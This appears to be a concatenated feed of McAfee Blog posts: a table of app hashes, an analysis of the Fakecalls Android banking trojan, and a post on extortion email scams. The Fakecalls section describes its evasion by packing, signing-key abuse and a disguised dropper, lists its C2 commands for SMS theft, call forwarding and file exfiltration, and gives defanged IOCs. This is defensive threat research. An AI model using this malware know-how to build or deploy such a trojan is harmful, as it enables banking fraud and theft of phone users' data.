com.game.skyland.craft.monster.block.best	Craft Forrest Mini Fun	e5fc2e6e3749cb4787a8bc5387ebb7802a2d3f9b408e4d2d07ee800056bb3e16	100K+
com.everyday.vip.caves.house.block.craft	Craft Sword City Pro	318165fd8d77a63ca221f5d3ee163e6f2d6df1f2df5c169aca6aca23aef2cf25	100K+
com.cell.rain.block.craft.loki.fairy	Block Loki Monster Builder	4f22be2ce64376f046ca180bd9933edcd62fd36f4a7abc39edf194f7170e2534	100K+
com.block.good.sun.boy.craft.fun	Block Boy Earth Mini	3b0cf56fb5929d23415259b718af15118c44cf918324cc62c1134bf9bc0f2a00	100K+
com.fairy.builder.sun.skyland.craft.block	Block Crazy Builder City	537638903f31e32612bddc79a483cb2c7546966cca64c5becec91d6fc4835e22	100K+
com.monster.house.good.block.earth.craft	Craft Sword Vip Pixelart	5f85f020eb8afc768e56167a6d1b75b6d416ecb1ec335d4c1edb6de8f93a3cad	100K+
com.block.best.boy.craft.sword.cell	Block City Fun Diamond	698544a913cfa5df0b2bb5d818cc0394c653c9884502a84b9dec979f8850b1e7	100K+
com.crazy.clever.city.block.caves.craft	Craft City Loki Rainbow	ba50dc2d2aeef9220ab5ff8699827bf68bc06caeef1d24cb8d02d00025fcb41c	100K+
com.cliffs.builder.craft.block.lucky.earth	Craft Boy Clever Sun	77962047b32a44c472b89d9641d7783a3e72c156b60eaaec74df725ffdc4671b	100K+
com.lucky.best.block.game.diamond.craft	Block City Dragon Sun	ac3d0b79903b1e63b449b64276075b337b002bb9a9a9636a47fdd1fb7a0fe368	100K+
com.build.craft.boy.loki.master.block	Craft Loki Forrest Monster	a2db1eba73d911142134ee127897d5857c521135a8ee768ae172ae2d2ee7b1d4	100K+
com.build.lokicrafts.master.forest	Lokicraft: Forrest Survival 3D	0f53996f5e3ec593ed09e55baf1f93d32d891f7d7e58a9bf19594b235d3a8a84	50K+
com.sun.realm.craft.lucky.dragon.block	Craft Castle Sun Rain	1e74e73bc29ce1f55740e52250506447b431eb8a4c20dfc75fd118b05ca18674	50K+
com.block.craft.vip.sun.game.box	Craft Game Earth World	7483b6a493c0f4f6309e21cc553f112da191b882f96a87bce8d0f54328ac7525	50K+
com.rain.crazy.lucky.pro.block.craft	Craft Lucky Castle Builder	de5eb8284ed56e91e665d13be459b9a0708fa96549a57e81aa7c11388ebfa535	50K+
com.JavaKidz.attacksnake	Craftsman: Building City 2022	e19fcc55ec4729d52dc0f732da02dc5830a2f78ec2b1f37969ee3c7fe16ddb37	50K+
com.skyland.house.block.craft.crazy.vip	Craft Rainbow Pro Rain	a7675a08a0b960f042a02710def8dd445d9109ca9da795aed8e69a79e014b46f	50K+

 

The post HiddenAds Spread via Android Gaming Apps on Google Play appeared first on McAfee Blog.

Authored by Dexter Shin 

McAfee Mobile Research Team found an Android banking trojan signed with a key used by legitimate apps in South Korea last year. By design, Android requires that all applications must be signed with a key, in other words a keystore, so they can be installed or updated. Because this key can only be used by the developer who created it, an application signed with the same key is assumed to belong to the same developer. That is the case of this Android banking trojan that uses this legitimate signing key to bypass signature-based detection techniques. And these banking trojans weren’t distributed on Google Play or official app stores until now. This threat had been disclosed to the company that owns the legitimate key last year and the company has taken precautions. The company has confirmed that they have replaced the signing key and currently, all their legitimate apps are signed with a new signing key. 

Android malware using a legitimate signing key 

While tracking the Android banking trojan Fakecalls we found a sample using the same signing key as a well–known app in Korea. This app is developed by a reputable IT services company with extensive businesses across various sectors, including but not limited to IT, gaming, payment, and advertising. We confirmed that most of the malicious samples using this key pretend to be a banking app as they use the same icon as the real banking apps. 

Figure 1. Malware and legitimate app on Google Play 

Distribution method and latest status 

Domains verified last August when we first discovered the samples are now down. However, we investigated URLs related to this malware and we found similar ones related to this threat. Among them, we identified a phishing site that is still alive during our research. The site is also disguised as a banking site. 

Figure 2. A phishing page disguised as a Korean banking site 

We also found that they updated the domain information of this web page a few days before our investigation. 

So we took a deeper look into this domain and we found additional unusual IP addresses that led us to the Command and control(C2) server admin pages used by the cybercriminals to control the infected devices. 

 

Figure 3. Fakecalls Command and control(C2) admin pages 

How does it work 

When we check the APK file structure, we can see that this malware uses a packer to avoid analysis and detection. The malicious code is encrypted in one of the files below. 

Figure 4. Tencent’s Legu Packer libraries 

After decrypting the DEX file, we found some unusual functionality. The code below gets the Android package information from a file with a HTML extension. 

 Figure 5. Questionable code in the decrypted DEX file 

This file is in fact another APK (Android Application) rather than a traditional HTML file designed to be displayed in a web browser. 

Figure 6. APK file disguised as an HTML file 

When the user launches the malware, it immediately asks for permission to install another app. Then it tries to install an application stored in the “assets” directory as “introduction.html”. The “introduction.html” is an APK file and real malicious behavior happens here. 

Figure 7. Dropper asks you to install the main payload 

When the dropped payload is about to be installed, it asks for several permissions to access sensitive personal information. 

Figure 8. Permissions required by the main malicious application 

It also registers several services and receivers to control notifications from the device and to receive commands from a remote Command and Control server. 

 Figure 9. Services and receivers registered by the main payload

By contrast, the malware uses a legitimate push SDK to receive commands from a remote server. Here are the complete list of commands and their purpose. 

 

Command name	Purpose
note	sms message upload
incoming_transfer	caller number upload
del_phone_record	delete call log
zhuanyi	set call forwarding with parameter
clear_note	delete sms message
assign_zhuanyi	set call forwarding
file	file upload
lanjie	block sms message from specified numbers
allfiles	find all possible files and upload them
email_send	send email
record_telephone	call recording on
inout	re-mapping on C2 server
blacklist	register as blacklist
listener_num	no function
no_listener_num	disable monitoring a specific number
rebuild	reset and reconnect with C2
deleteFile	delete file
num_address_list	contacts upload
addContact	add contacts
all_address_list	call record upload
deleteContact	delete contacts
note_intercept	intercept sms message from specified numbers
intercept_all_phone	intercept sms message from all
clear_date	delete all file
clear_phone_contact	delete all contacts
clear_phone_record	delete all call log
per_note	quick sms message upload
soft_name	app name upload

 

Cybercriminals are constantly evolving and using new ways to bypass security checks, such as abusing legitimate signing keys. Fortunately, there was no damage to users due to this signing key leak. However, we recommend that users install security software on their devices to respond to these threats. Also, users are recommended to download and use apps from the official app stores. 

McAfee Mobile Security detects this threat as Android/Banker regardless of the application, is signed with the previously legitimate signing key. 

 

Indicators of Compromise 

 

SHA256	Name	Type
7f4670ae852ec26f890129a4a3d3e95c079f2f289e16f1aa089c86ea7077b3d8	신한신청서	Dropper
9e7c9b04afe839d1b7d7959ad0092524fd4c6b67d1b6e5c2cb07bb67b8465eda	신한신청서	Dropper
21ec124012faad074ee1881236c6cde7691e3932276af9d59259df707c68f9dc	신한신청서	Dropper
9621d951c8115e1cc4cf7bd1838b8e659c7dea5d338a80e29ca52a8a58812579	신한신청서	Dropper
60f5deb79791d2e8c2799e9af52adca5df66d1304310d1f185cec9163deb37a2	보안인증서	Banker
756cffef2dc660a241ed0f52c07134b7ea7419402a89d700dffee4cc6e9d5bb6	보안인증서	Banker
6634fdaa22db46a6f231c827106485b8572d066498fc0c39bf8e9beb22c028f6	보안인증서	Banker
52021a13e2cd7bead4f338c8342cc933010478a18dfa4275bf999d2bc777dc6b	보안인증서	Banker
125772aac026d7783b50a2a7e17e65b9256db5c8585324d34b2e066b13fc9e12	보안인증서	Banker
a320c0815e09138541e9a03c030f30214c4ebaa9106b25d3a20177b5c0ef38b3	보안인증서	Banker
c7f32890d6d8c3402601743655f4ac2f7390351046f6d454387c874f5c6fe31f	보안인증서	Banker
dbc7a29f6e1e91780916be66c5bdaa609371b026d2a8f9a640563b4a47ceaf92	보안인증서	Banker
e6c74ef62c0e267d1990d8b4d0a620a7d090bfb38545cc966b5ef5fc8731bc24	보안인증서	Banker

 

Domains: 

• http[://]o20-app.dark-app.net 
• http[://]o20.orange-app.today 
• http[://]orange20.orange-app.today 

The post Fakecalls Android Malware Abuses Legitimate Signing Key appeared first on McAfee Blog.

Authored by Lakshya Mathur and Sriram P 

McAfee Intelligence observed a huge spike in extortion email frauds over the past month. The intent of these fraudulent activities is to intimidate individuals into paying a specified amount of money as a ransom. 

Figure 1 shows the number of blackmail emails received over a month recently. 

Figure 1 – Stats for 20 February 2023 – 23rd March 2023

 

In this blog, we’ll delve into frauds that are becoming increasingly common in the digital age. We’ll first define what these frauds are and provide examples to help readers better understand the nature of these frauds. Additionally, we’ll explore how these frauds are on the rise, highlighting the reasons behind this trend and the impact it has on individuals. 

Finally, we’ll provide practical advice to help consumers protect themselves from these types of attacks. This will include a discussion of some of the most effective measures individuals can take to safeguard their personal and financial information from fraudsters. 

What are Extortion Frauds? 

Extortion emails are a type of scam where cybercriminals send threatening messages to individuals or organizations—demanding payment in exchange for not releasing sensitive or embarrassing information. These emails typically claim that the sender has compromising information, such as private photos or personal data, and threaten to share it with the recipient’s friends, family, or the public unless a payment is made. The payment is usually asked in the form of cryptocurrency, such as Bitcoin in the recent spam, which is difficult to trace and can be transferred quickly and anonymously. The goal of these emails is to scare the recipient into paying the demanded amount, even though there might not be any compromising information to release. 

Examples of Extortion fraud 

Scammers use different scareware sentiments like bad internet browsing habits, hacking for Wi-Fi, and hacking of networks because of hardware vulnerabilities. We’ll now examine various illustrations of extortion emails and analyze scammers’ strategies to intimidate victims into providing payment. By presenting various real-life examples, we can demonstrate how scammers use scareware tactics to manipulate and intimidate their victims into complying with their demands. By instilling fear, the scammers hope to provoke a sense of urgency in the victim, increasing the likelihood that they will pay the demanded ransom. 

Figure 2 – Extortion fraud Example 1 

 

Figure 2 is an illustration of a typical extortion email that scammers use to exploit their victims. In this instance, the scammer is claiming to have gained unauthorized access to the victim’s account through a security vulnerability in a Cisco router. The scammer is then threatening to expose embarrassing information about the victim unless a payment of $1,340 is made. 

The payment is demanded through a Bitcoin wallet address that the scammer has provided. In this example, the scammer has obfuscated the Bitcoin wallet address by adding spaces between the characters, which is a tactic used to make it harder to track the payment. Now, let us examine another instance of extortion emails. 

Figure 3 – Extortion fraud example 2 

 

Figure 3 is another example of an extortion email that scammers use to trick and manipulate their victims. In this case, the attacker is claiming to have gained unauthorized access to the victim’s accounts and has deployed trojans and viruses on the victim’s system. The scammer is also blackmailing the victim by alleging that they have explicit adult content about the victim and the victim’s web browsing history. The purpose of this is to instill fear and provoke a sense of urgency in the victim. 

Like the previous example, the scammer has provided a Bitcoin wallet address for the victim to make a ransom payment of $950. Additionally, the attacker has explained that the virus they’ve deployed is undetectable by antivirus software because they’ve used drivers that update the virus every few hours. 

Use of Cryptocurrency 

Cryptocurrency tools are the most common way these scammers ask for a ransom. They use this tactic because it is difficult to trace and can be sent quickly and anonymously to other platforms. We noticed that scammers were demanding ransom payments through Bitcoin wallets. So, we tried to gather statistics on the number of unique Bitcoin wallets we came across in the past month. 

Figure 4 – Unique Bitcoin Stats for 20th February 2023 – 23rd March 2023 

We checked these Bitcoin addresses to see what their transactions activities are and their reputation on the blockchain and Bitcoin abuse database. Below are some snapshots of the transaction of these addresses. 

 

Figure 5 – Bitcoin received, and abuse report count for Bitcoin address 

As illustrated in Figure 5, it is clear that the Bitcoin addresses mentioned in these extortion emails have numerous abuse reports against them. Additionally, some ransom payments have been received through these addresses. Our intelligence also collected weekly trends on how much money they had within them.

Figure 6 – Total Amount received (US Dollars) in that week  

Figure 6 shows that the amount of money received in these Bitcoin addresses is increasing weekly. This implies that scammers are successfully extorting money from more consumers. 

How to avoid these frauds? 

If you receive extortion emails, follow the steps outlined below. 

• Don’t make any decisions quickly and don’t panic. If you panic that will be a win for these scammers. 
• Mostly the stuff they scare you about in the mail is always false. As soon as you receive such think twice before sending payment emails, to block them and delete them. 
• Try to search important keywords on your search engines, for example, if scammers are claiming to exploit Cisco router vulnerabilities search that vulnerability with keywords like ‘BTC’, ‘hack’, and some other keywords from the email, and you will find many results which will help you to understand that the scammer’s claims are only false. 
• Try to discover more about the email you got, you can search for the sender’s address, the subject of the mail, or even certain paragraphs from the mail on the internet. You will surely get information on how these emails are only scareware.
• Keep yourself educated on such scams so that you can protect yourself.
• Keep your antivirus updated and do timely full scans of your machines.
• Don’t surf on questionable web pages or download illegal/cracked software. 

Despite advancements in technology, extortion frauds continue to increase as seen in this blog. However, the best defense against such scams is to remain calm, and informed, and to make others aware of such frauds. By following the steps mentioned above, such as not responding to or paying any ransom demands, keeping your system and software updated, using strong passwords, and being wary of unusual emails or links, you can protect yourself from falling victim to these frauds. It is important to stay vigilant and to report any questionable activity to the appropriate authorities. By taking these precautions, you can help prevent yourself and others from becoming victims of extortion fraud. 

The post Extortion Fraud is Still on the Rise appeared first on McAfee Blog.